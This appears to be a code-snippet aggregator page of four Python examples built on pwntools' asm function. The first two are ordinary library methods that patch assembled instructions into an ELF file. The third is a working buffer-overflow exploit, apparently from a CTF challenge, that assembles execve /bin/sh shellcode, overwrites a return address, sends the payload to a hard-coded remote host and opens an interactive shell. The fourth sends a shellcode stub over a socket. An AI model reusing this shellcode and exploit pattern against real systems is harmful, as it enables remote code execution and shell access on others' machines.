Example #1
0
    def asm(self, address, assembly):
        """Assembles the specified instructions and inserts them
        into the ELF at the specified address.

        The resulting binary can be saved with ELF.save()
        """
        binary = asm(assembly, vma=address)
        self.write(address, binary)
Example #2
0
    def asm(self, address, assembly):
        """asm(address, assembly)

        Assembles the specified instructions and inserts them
        into the ELF at the specified address.

        This modifies the ELF in-pace.
        The resulting binary can be saved with :meth:`.ELF.save`
        """
        binary = asm(assembly, vma=address)
        self.write(address, binary)
Example #3
0
# pop rax # 1 byte
# cdq # 1 byte
# sub esp, 0x16 # 3 bytes <-- 0x16 because 18 bytes + 4 bytes (ret override) = 22 bytes
# jmp esp # 2 bytes

from pwnlib.asm import *
from pwn import *

payload_part_1 = [
    'push 0x0b', 'pop eax', 'push ecx', 'push 0x68732f2f', 'push 0x6e69622f',
    'mov ebx, esp', 'int 0x80'
]
payload_part_2 = ['xor ecx, ecx', 'xor edx, edx', 'sub esp, 0x16', 'jmp esp']
# trying with strings
# \x31\xC9\x31\xD2\x68\x2F\x2F\x73\x68\x68\x2F\x62\x69\x6E\x89\xE3\xCD\x08\x6A\x0B\x58\x99\x83\xEC\x16\xFF\xE4
hexload1 = b''.join([asm(i, arch='i386') for i in payload_part_1])
hexload2 = b''.join([asm(i, arch='i386') for i in payload_part_2])
payload = hexload1 + p32(0x0804919f) + hexload2
print(payload, len(payload))

HOST = '167.71.143.20'
PORT = 31501

p = remote(HOST, PORT)
p.recvuntil("> ")
p.sendline(payload)
p.interactive()

with open('payload.hex', 'wb') as f:
    f.write(payload)
Example #4
0
from pwn import *
from pwnlib.asm import *

LOCAL = ('localhost', 40002)
LOCAL = (sys.argv[1], 40002)
# LOCAL = ('128.199.133.96',31331)
BUFFER = 4096

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(LOCAL)

x = asm("""
    mov ax,0x3
    push eax
    pop ebx
    sub cx,128
    push ecx
    pop edx
    int 0x80
    ret
""")

print len(x), x.encode('hex')

raw_input("?")
s.send(x)

print s.recv(BUFFER)
print s.recv(BUFFER)
print s.recv(BUFFER)

s.close()